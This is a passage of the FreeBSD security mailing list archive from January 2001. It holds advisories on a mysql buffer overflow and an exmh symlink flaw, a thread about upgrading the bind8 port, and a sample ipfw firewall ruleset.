http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOnXgJ1UuHi5z0oilAQHo6wQAj3xyGIyobs/grdxqowjFMcpE86ZxuguC
/FzN9pNGbj2/tRv+5XWALJs4dl5mfqNruxeNlFy7uNZAoLztRd5DxuPa/KLJBh3R
NYUFjCBzBbjMDZzSOQSpRWwMrs8o/y5qWgAEdVQXqTmXPrKKnbiIBpAYRX/9pzGW
s199naiw8yM=
=M4Q1
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jan 30 1:27:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
	by hub.freebsd.org (Postfix) with ESMTP id 5CEB337B6A2
	for ; Tue, 30 Jan 2001 01:26:38 -0800 (PST)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168])
	by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19);
	Tue, 30 Jan 2001 01:24:33 -0800
Received: (from cjc@localhost)
	by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0U9QLW07541;
	Tue, 30 Jan 2001 01:26:21 -0800 (PST)
	(envelope-from cjc)
Date: Tue, 30 Jan 2001 01:26:16 -0800
From: "Crist J. Clark"
To: Dan Langille
Cc: security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
Message-ID: <20010130012616.J91447@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: ; <20010129225905.F91447@rfx-216-196-73-168.users.reflex> <200101300712.UAA56104@ducky.nz.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <200101300712.UAA56104@ducky.nz.freebsd.org>; from dan@langille.org on Tue, Jan 30, 2001 at 08:12:21PM +1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Jan 30, 2001 at 08:12:21PM +1300, Dan Langille wrote:
> On 29 Jan 2001, at 22:59, Crist J. Clark wrote:
>
> > On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote:
> > > Mehmet Hinc wrote:
> > > > Stop in /usr/ports/net/bind8.
> > > > *** Error code 1
> > > >
> > > > What ??????????? Why??????????? I updated my ports and tried to install
> > > > bind8.2.3 because bind8.2.2 has had a vulnerability, so while I was
> > > > installing it, I had an error msg. (in the up)
> > > > please let me know how can I fix it !!!
> > >
> > > Bind was written on BSD. What's the point of using a port to
> > > upgrade it? All FreeBSD's bind port does is increase your chances
> > > of errors, reduce your system's overall QA, and install duplicate
> > > files in non-standard places. The following steps have worked
> > > flawlessly over this and several bind upgrades:
> >
> > # cd /usr/ports/net/bind8
> > # make PREFIX=/usr install
> >
> > PREFIX rocks.
>
> It can't be that simple!

I hate to break it to you (I guess?), but it is. I did it on my CURRENT
box for testing and it clobbered the old BIND quite nicely. Before,

bubbles# ls -l /usr/sbin/named
-r-xr-xr-x  1 root  wheel  501408 Jan 18 13:17 /usr/sbin/named

After,

bubbles# !ls
ls -l /usr/sbin/named
-rwxr-xr-x  1 root  wheel  595752 Jan 30 01:22 /usr/sbin/named

Like I said, PREFIX rocks.

-- 
Crist J. Clark                                cjclark@alum.mit.edu

From owner-freebsd-security Tue Jan 30 1:27:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP id 0FDBA37B69E;
	Tue, 30 Jan 2001 01:25:43 -0800 (PST)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f0U9Phr89218;
	Tue, 30 Jan 2001 01:25:43 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Tue, 30 Jan 2001 01:25:43 -0800 (PST)
Message-Id: <200101300925.f0U9Phr89218@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:16.mysql
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:16                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          mysql may allow remote users to gain increased privileges

Category:       ports
Module:         mysql322-server/mysql323-server
Announced:      2001-01-29
Credits:        Nicolas GREGOIRE
Affects:        Ports collection prior to the correction date.
Corrected:      2001-01-19
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

mysql is a high-performance database server.

II.  Problem Description

The mysql323-server port, versions prior to 3.23.22, and all
mysql322-server ports contain remote vulnerabilities. Due to a buffer
overflow, a malicious remote user can cause a denial-of-service by
crashing the database. Additionally, the attacker may be able to gain
the privileges of the mysqld user, allowing access to all databases and
the ability to leverage other local attacks as the mysqld user. In order
to accomplish this, the attacker must have a valid mysql account.

The mysql322-server and mysql323-server ports are not installed by
default, nor are they "part of FreeBSD" as such: they are part of the
FreeBSD ports collection, which contains over 4500 third-party
applications in a ready-to-install format. The ports collections
shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was
discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Malicious remote mysql users may cause a denial-of-service and
potentially gain access as the mysqld user, allowing access to all
databases on the mysql server and the ability to leverage other local
attacks as the mysqld user.

If you have not chosen to install the mysql322-server or mysql323-server
ports/packages, then your system is not vulnerable to this problem.

IV.  Workaround

Deinstall the mysql322-server or mysql323-server port/package, if you
have installed it.

V.   Solution

Note: the mysql322-server port has been removed since mysql 3.23 is now
the stable mysql branch. People using older mysql322-server
ports/packages are urged to update to the mysql323-server port/package.

One of the following:

1) Upgrade your entire ports collection and rebuild the mysql323-server
port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/databases/mysql-3.23.32.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/databases/mysql-3.23.32.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/databases/mysql-3.23.32.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

3) download a new port skeleton for the mysql323-server port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOnXg81UuHi5z0oilAQEIKgP/fLnAPAIJt33PQl6NYnBzivsjX0/w0TGW
MVkX3OAz14EZYGEajJJfCf2QboqvDYMMuoYNQS3MF8eTmSNQxpzDpRzFyU8zeiUj
UnAzKWk+4vjTRkM8BcQHuXfsuzh/H1KjENjo+gbCrmXitLWjuFSS9l/U91tWeyMM
sQevoqqqXQE=
=8xko
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jan 30 1:27:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP id B93E437B4EC;
	Tue, 30 Jan 2001 01:26:13 -0800 (PST)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f0U9QD589290;
	Tue, 30 Jan 2001 01:26:13 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Tue, 30 Jan 2001 01:26:13 -0800 (PST)
Message-Id: <200101300926.f0U9QD589290@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:17.exmh2 Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:17 Security Advisory FreeBSD, Inc. Topic: exmh symlink vulnerability Category: ports Module: exmh2 Announced: 2001-01-29 Credits: Stanley G. Bubrouski Affects: Ports collection prior to the correction date. Corrected: 2001-01-22 Vendor status: Updated version released FreeBSD only: No I. Background exmh is a tcl/tk based interface to the mh mail user agent. II. Problem Description The exmh2 port, versions prior to 2.3.1, contains a local vulnerability: at startup, if exmh detects a problem in its code or configuration an error dialog appears giving the user an option to fill in a bug report and email it to the maintainer. If the user agrees to mail the maintainer a file named /tmp/exmhErrorMsg is created. If the file exists and is a symlink, it will follow the link, allowing local files writable by the user to be overwritten. The exmh2 port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 4500 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Malicious local users may cause arbitrary files writable by the user running exmh to be overwritten, in certain restricted situations. If you have not chosen to install the exmh2 port/package, then your system is not vulnerable to this problem. IV. 
Workaround Deinstall the exmh2 port/package, if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the exmh2 port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/exmh-2.3.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/exmh-2.3.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/exmh-2.3.1.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) download a new port skeleton for the exmh2 port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXiAVUuHi5z0oilAQFN1QP/Y8TNT5P86VCujRk704GXV9Lxw4W6+lgZ s6wmSPnm8BmO/MZo4RZ+snZToo9lZWEbgU490LU7sUjy8ehMiP6F2OpViuFT76ug INFou7NHIAmMre2iFzyy6pcsLttX0emc02qUiEPDCLXrgF0BvhbqC3myXsbUzrpJ srN7OD3Y8l4= =1966 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:28:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org 
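The exmh advisory above is the classic fixed-name temporary file bug: a program writes to a predictable path under /tmp, and a local user who pre-creates that path as a symlink redirects the write onto any file the victim can write. The following is an added example, not exmh's code and not the fix shipped in 2.3.1 (which the advisory does not show). It reproduces the attack against a private scratch directory standing in for /tmp and shows the standard hardening: let mktemp(1) create the report file under an unpredictable name with O_CREAT|O_EXCL, so an existing file or link at the name makes creation fail rather than being followed. The scratch directory, the victim file and the report text are constructed for the demonstration; only the file name exmhErrorMsg comes from the advisory.

```shell
#!/bin/sh
# Added example: symlink following on a fixed /tmp name, and the mktemp fix.
# In every function "$1" is a scratch directory standing in for /tmp.

# Vulnerable pattern: write the bug report to a predictable, world-guessable
# name. The shell's ">" opens the path with O_CREAT|O_TRUNC, which follows a
# symlink, so whatever the link points at is truncated and overwritten.
write_report_unsafe() {        # $1 = tmpdir, $2 = report text
    printf '%s\n' "$2" > "$1/exmhErrorMsg"
}

# Hardened pattern: mktemp creates a fresh file with a random suffix using
# O_CREAT|O_EXCL (mkstemp(3) underneath). An attacker cannot guess the name,
# and even if a file or symlink already sat at that name the open would fail
# instead of following it. The created path is printed for the caller.
write_report_safe() {          # $1 = tmpdir, $2 = report text
    f=$(mktemp "$1/exmhErrorMsg.XXXXXX") || return 1
    printf '%s\n' "$2" > "$f"
    printf '%s\n' "$f"
}

# Attacker side: plant a symlink at the predictable name pointing at a file
# the victim user can write (constructed victim, in the same scratch dir).
plant_symlink() {              # $1 = tmpdir, $2 = victim path
    ln -s "$2" "$1/exmhErrorMsg"
}
```

A sticky /tmp does not help here: the attacker owns the symlink, and it is the victim's own write that lands on the victim's own file. The fix has to be in the program that creates the file.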
(adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id 94C7237B6A3 for ; Tue, 30 Jan 2001 01:26:40 -0800 (PST)
Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id BAA39146; Tue, 30 Jan 2001 01:26:46 -0800 (PST) (envelope-from root@noops.org)
Date: Tue, 30 Jan 2001 01:26:46 -0800 (PST)
From: Thomas Cannon
To: Kris Kennaway
Cc: FBSDSecure@aol.com, freebsd-security@FreeBSD.ORG
Subject: Re: (no subject)
In-Reply-To: <20010130011533.A43910@xor.obsecurity.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > critical IPs are placed in the ignore file. The DNS and email
> > servers I did not consider, but they will be added. Thanks for the
> > tip.
>
> "It's too difficult", etc.

Firewall policy has a simple rule:

Deny all not allowed

When setting up something that will auto-ban hosts or networks, you
need the opposite of the firewall rule -- namely, to allow things you
don't want banned. Surely you can see where I'm going. It's an obvious
conclusion, I'd think. It might be okay for a desktop machine, but
nothing more advanced....

Lest I sound like I'm picking on some vendor/writer of code... logcheck
rocks.

-tcannon

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 1:32:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 3844C37B69C for ; Tue, 30 Jan 2001 01:31:55 -0800 (PST)
Received: by obsecurity.org (Postfix, from userid 1000) id 8C261BA2B4; Tue, 30 Jan 2001 01:32:25 -0800 (PST)
Date: Tue, 30 Jan 2001 01:32:25 -0800
From: Kris Kennaway To: security@freeBSD.org Subject: Security advisory SA-01:10.bind Message-ID: <20010130013225.A44140@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="OXfL5xGRrasGEqWY" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --OXfL5xGRrasGEqWY Content-Type: text/plain; charset=us-ascii Content-Disposition: inline As you've probably noticed, we got Majordomo fixed (it was configured to filter emails containing the text "automatically generated", which is usually found in those annoying email virus scanner notifications). However, I have decided not to reissue advisory 01:10 which was originally released last week, due to the potential for confusion over the latest BIND vulnerability (which is in fact a different problem altogether) and the fact that the new problem is a more serious one which will require everyone to upgrade anyway. It's still archived on the FTP site and made it to Bugtraq if anyone really wants to read it. 
Kris --OXfL5xGRrasGEqWY Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6doooWry0BWjoQKURAqGFAKDrQxTv+1fV7wJfwzydAwBBcKZsFQCeLXFH evsv5wzpoCNuEOAnj2Asxxw= =GPee -----END PGP SIGNATURE----- --OXfL5xGRrasGEqWY-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:49:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id 78E1437B69C for ; Tue, 30 Jan 2001 01:48:55 -0800 (PST) Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id JAA02905; Tue, 30 Jan 2001 09:52:44 GMT (envelope-from jus@security.za.net) X-Authentication-Warning: athena.za.net: jus owned process doing -bs Date: Tue, 30 Jan 2001 11:52:14 +0200 (SAST) 
From: Justin Stanford
X-Sender: jus@athena.za.net
To: cjclark@alum.mit.edu
Cc: security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
In-Reply-To: <20010130012616.J91447@rfx-216-196-73-168.users.reflex>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Does your bind8 port actually work?

I cvsupped from cvsup.freebsd.org and downloaded the distfiles from
ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes
patch failure) - so I simply can't get the port to go ahead and
compile/install.. - I also tried rm'ing the bind8 directory and freshly
cvsupping it - no go.

--
Justin Stanford
082 7402741
jus@security.za.net
www.security.za.net
IT Security and Solutions

On Tue, 30 Jan 2001, Crist J. Clark wrote:

> On Tue, Jan 30, 2001 at 08:12:21PM +1300, Dan Langille wrote:
> > On 29 Jan 2001, at 22:59, Crist J. Clark wrote:
> >
> > > On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote:
> > > > Mehmet Hinc wrote:
> > > > > Stop in /usr/ports/net/bind8.
> > > > > *** Error code 1
> > > > >
> > > > > What ??????????? Why??????????? I updated my ports and tried to install
> > > > > bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was
> > > > > installing it, I had a error msgs. (in the up)
> > > > > please let me know How can I fix it !!!
> > > >
> > > > Bind was written on BSD. What's the point of using a port to
> > > > upgrade it? All FreeBSD's bind port does is increase your chances
> > > > of errors, reduce your system's overall QA, and install duplicate
> > > > files in non-standard places. The following steps have worked
> > > > flawlessly over this and several bind upgrades:
> > >
> > > # cd /usr/ports/net/bind8
> > > # make PREFIX=/usr install
> > >
> > > PREFIX rocks.
> >
> > It can't be that simple!
>
> I hate to break it to you (I guess?), but it is. I did it on my
> CURRENT box for testing and it clobbered the old BIND quite nicely.
> Before,
>
> bubbles# ls -l /usr/sbin/named
> -r-xr-xr-x 1 root wheel 501408 Jan 18 13:17 /usr/sbin/named
>
> After,
>
> bubbles# !ls
> ls -l /usr/sbin/named
> -rwxr-xr-x 1 root wheel 595752 Jan 30 01:22 /usr/sbin/named
>
> Like I said, PREFIX rocks.
> --
> Crist J. Clark cjclark@alum.mit.edu
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 2: 1: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 642F937B6A4 for ; Tue, 30 Jan 2001 02:00:46 -0800 (PST)
Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 14NXac-0007XV-00; Tue, 30 Jan 2001 12:00:42 +0200
Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id MAA12280; Tue, 30 Jan 2001 12:00:39 +0200 (SAST)
Received: by nwl.fw.uunet.co.za via recvmail id 11836; Tue Jan 30 11:59:10 2001
Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.20 #1) id 14NXZ8-0001fz-00; Tue, 30 Jan 2001 11:59:10 +0200
From: Sheldon Hearn
To: Pete Fritchman
Cc: John Telford , freebsd-security@freebsd.org
Subject: Re: IPFW modify the "simple" rule set 4.2 to allow ...
In-reply-to: Your message of "Wed, 24 Jan 2001 10:46:31 EST." <20010124104631.B4887@databits.net>
Date: Tue, 30 Jan 2001 11:59:10 +0200
Message-ID: <6446.980848750@axl.fw.uunet.co.za>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 24 Jan 2001 10:46:31 EST, Pete Fritchman wrote:

> You'll need to modify /etc/rc.firewall. Look through until you see something
> like:

This isn't ideal. Rather, allow the system to boot with
firewall_type="simple" in /etc/rc.conf. Then use ipfw(8) to show the
ruleset in place. Then copy these rules into /etc/firewall.local or
whatever. Then set firewall_type="/etc/firewall.local" or whatever.

Here's what my /etc/firewall.axl looks like:

-------------------------
-f flush

add allow ip from any to any via lo0
add deny log ip from any to 127.0.0.0/8

# These two rules save over-use of dynamic rules instantiated by the
# 'keep-state' rule at the bottom.
#
add allow tcp from 172.16.3.5 to 172.16.0.1 domain
add allow tcp from 172.16.0.1 domain to 172.16.3.5
add allow tcp from 172.16.0.1 to 172.16.3.5 smtp
add allow tcp from 172.16.3.5 smtp to 172.16.0.1
add allow tcp from any to 172.16.3.5 ssh
add allow tcp from 172.16.3.5 ssh to any

# The next six rules open up enough to allow Samba (NTLM sharing) access
# from remote hosts.
#
add allow udp from 172.16.0.0/15 to 172.16.3.5 137
add allow udp from 172.16.3.5 137 to 172.16.0.0/15
add allow udp from 172.16.0.0/15 to 172.16.3.5 138
add allow udp from 172.16.3.5 138 to 172.16.0.0/15
add allow tcp from 172.16.0.0/15 to 172.16.3.5 139
add allow tcp from 172.16.3.5 139 to 172.16.0.0/15

# This is the rule that allows any kind of OUTBOUND connection to be
# established and then used, given the net.inet.ip.fw lifetime values.
#
add allow all from 172.16.3.5 to any keep-state
-------------------------

The '-f flush' allows me to make changes to the file and then reload it
using the command "ipfw /etc/firewall.axl" whenever I feel like it, but I
think that flushes dynamic rules as well, so use with caution.

Ciao,
Sheldon.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 2:11:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id DFEA937B4E0 for ; Tue, 30 Jan 2001 02:11:30 -0800 (PST)
Received: by obsecurity.org (Postfix, from userid 1000) id 61F9DBA2B4; Tue, 30 Jan 2001 02:12:01 -0800 (PST)
Date: Tue, 30 Jan 2001 02:12:01 -0800
From: Kris Kennaway To: Justin Stanford Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130021201.B44770@xor.obsecurity.org> References: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dTy3Mrz/UPE2dbVg" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jus@security.za.net on Tue, Jan 30, 2001 at 11:52:14AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --dTy3Mrz/UPE2dbVg Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 11:52:14AM +0200, Justin Stanford wrote: > Does your bind8 port actually work? >=20 > I cvsupped from cvsup.freebsd.org and downloaded the distfiles from > ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes > patch failure) - so I simply can't get the port to go ahead and > compile/install.. - I also tried rm'ing the bind8 directory and freshly > cvsupping it - no go. It built when I downloaded it after cvsup on a fresh machine earlier tonight (not the one I built/committed on). Anyone else seeing this? 
Kris --dTy3Mrz/UPE2dbVg Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dpNwWry0BWjoQKURAv3oAJ944VFHSyYh4O5mdXQAVhGwXhQ9rgCg3lJh eo0xIGfmxa5D3LilE+7kc+A= =/5MI -----END PGP SIGNATURE----- --dTy3Mrz/UPE2dbVg-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:12:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 2D38A37B69F for ; Tue, 30 Jan 2001 02:12:40 -0800 (PST) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0) with ESMTP id f0UACBI33613; Tue, 30 Jan 2001 04:12:11 -0600 (CST) Date: Tue, 30 Jan 2001 04:12:11 -0600 (CST) 
From: Alex Charalabidis
To: Justin Stanford
Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 30 Jan 2001, Justin Stanford wrote:

> Does your bind8 port actually work?
>
> I cvsupped from cvsup.freebsd.org and downloaded the distfiles from
> ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes
> patch failure) - so I simply can't get the port to go ahead and
> compile/install.. - I also tried rm'ing the bind8 directory and freshly
> cvsupping it - no go.

Old ports:

>> Attempting to fetch from ftp://ftp.isc.org/isc/bind/src/8.2.2-P7/.
1256951 bytes transferred in 6.4 seconds (190.35 kBps)

New with MASTER_SITES commented out:

>> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/.
Receiving bind-src.tar.gz (1256951 bytes): 14%C

Conclusion: Distfiles have not been updated and ftp.freebsd.org
still carries P7. There's your checksum mismatch.

Solution: Delete the distfile, let the port fetch it or fetch 8.2.3
yourself from ftp.isc.org.
-ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 System Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:16: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from orhi.sarenet.es (orhi.sarenet.es [192.148.167.5]) by hub.freebsd.org (Postfix) with ESMTP id 3670837B69C for ; Tue, 30 Jan 2001 02:15:52 -0800 (PST) Received: from sarenet.es (borja.sarenet.es [192.148.167.77]) by orhi.sarenet.es (Postfix) with ESMTP id 4692B497D for ; Tue, 30 Jan 2001 11:15:47 +0100 (MET) Message-ID: <3A769455.BBABF4F2@sarenet.es> Date: Tue, 30 Jan 2001 11:15:49 +0100 
